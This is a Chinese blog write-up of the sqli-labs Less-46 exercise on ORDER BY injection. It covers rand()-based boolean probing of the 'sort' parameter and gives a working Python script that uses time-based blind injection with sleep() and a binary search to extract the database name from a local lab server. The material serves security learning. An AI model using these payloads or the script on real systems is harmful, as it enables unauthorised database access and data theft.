sql-labs第46关 脚本盲注

最新推荐文章于 2024-04-30 00:46:24 发布
最新推荐文章于 2024-04-30 00:46:24 发布
阅读量528 收藏 9
点赞数 8
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NBbabay/article/details/136306487
版权

image-20240226181356240

我们直接可以从界面中得知传参的参数为SORT

查看源码

我们令参数即sort为1尝试输入:即 ?sort=1

image-20240226181647585

令参数即sort为2

image-20240226181726927

看到按照字母顺序进行了排序,所以使用了order by语句。

用 rand()盲注 这里首先假设给true以及false两个来观察回显

?sort=rand(true)

?sort=rand(false)

image-20240226183128224

image-20240226183211693

看到给的值为真以及假是不一样的,所以我们可以构造出一个布尔盲注或者延时盲注

?sort=rand(ascii(mid((select database()),1,1))>114)

image-20240226183819194

用py脚本进行盲注

代码如下

import requests
import time


def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
        	# 构造时间盲注
            payload = "if((ascii(substr(database(),%d,1))>%d),sleep(1),1)" % (i, mid)
            params = {"sort": payload}
            start_time = time.time()
            try:
                r = requests.get(url, params=params, timeout=20)
            except requests.Timeout:
                print("Request timed out.")
                continue
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)


if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-46/index.php'
    inject_database(url)

image-20240226185413541

这里我们可以看到使用脚本代码爆出了数据库名

柒玖zzz
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL入布尔
qq_45557130的博客
10-04 742
sql入布尔
SQL入之(小白的学习)
lgsyydsa的博客
06-04 574
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
Python自动化sql入:布尔
qq_46145027的博客
04-22 3354
在sql入时,使用python脚本可以大大提高入效率,这里演示一下编写python脚本实现布尔的基本流程:演示靶场:sqli-labs。
超硬核,SQL入之时间,原理+步骤+实战思路
最新发布
2401_84296945的博客
04-30 647
提示:sleep的时间可以自定义,时间太长效率太低、时间太短则不容易判断。
SQL及python脚本编写
nobugnomoney的博客
05-18 3448
1、什么是 就是在 sql 入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为。从 background-1 中,我们可以知道分为三类 基于布尔 SQL 基于时间的 SQL 基于报错的 SQL 0x01.基于布尔 SQL ----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL,包括脚本
weixin_45116657的博客
08-25 4526
目录: 一、SQL SQL与SQL入的区别; SQL的过程; 二、实验环境 三、实验过程 基于布尔值的; 基于时间的; 一、SQL简介 1、SQL:SQL Injection(Blind),即SQL,目标只会回复是或不是,没有详细内容; 入:可以查看详细的内容 2、手工思路: 手工的过程,就像你和机器人聊天一样,这个机器人知道的...
SQL之python脚本自动化
菜鸟学安全的博客
12-18 1346
sql无法使用sql语句入,需要大量的判断语句或者延时入。这样手动入方式比较慢,手动发现入点后可以使用python编写脚本入。
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
sql-labs技巧
03-01
在SQL入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL入技巧。本篇将详细解析如何通过SQL入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别入点。在`less1...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型入,报错型,布尔型,延时型...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
这个平台提供了多种类型的SQL入场景,包括、时间基入、联合查询入等,帮助用户深入理解SQL入的工作原理和防范方法。 使用这些工具,初学者可以学习到Web应用程序安全的基础知识,而专业人士则可以提升...
sqli-labs脚本
06-24
sqli-labs脚本 sqli-labs脚本 sqli-labs脚本
sqlpython脚本
weixin_48266255的博客
08-29 448
【代码】sqlpython脚本
SQL入入门进阶_报错入、延时入、python脚本
菜鸟学安全的博客
01-17 719
本篇文章入门SQL入,除了回显的SQL入还存在报错入、布尔和延时入。如果sqlmap跑不出来的还可以使用burp intrude入或者使用python编写脚本入。
sql入——时间自动化脚本
栉风沐雪的博客
05-14 674
因为最近在学习sql入,在学到时间这里,发现入的时候要从asc码33到127都查询一遍,手动入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
SQL(布尔
Dug123456_的博客
04-07 1120
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
SQL入——布尔 / Python 脚本爆破
weixin_51559599的博客
11-06 987
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
ctf各种sql脚本
qq_51862722的博客
08-17 2829
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL入-2 / 极客大挑战finilysql(buuctf) 1.通过post传参的脚本 用的时候修改post参数和个数 1.1 基于异或,布尔等: import requests url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:
Python自动化sql入:布尔_布尔脚本,Python客户端开发面试题目
2401_84182636的博客
04-10 643
演示靶场:sqli-labs。
sqli-labs第七
08-31
对于sqli-labs的第七,这是一道的挑战。在这个卡中,你需要利用漏洞来获取敏感信息。 是一种利用应用程序对用户输入的处理不当而导致的漏洞。这种漏洞通常出现在应用程序使用用户提供的数据来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值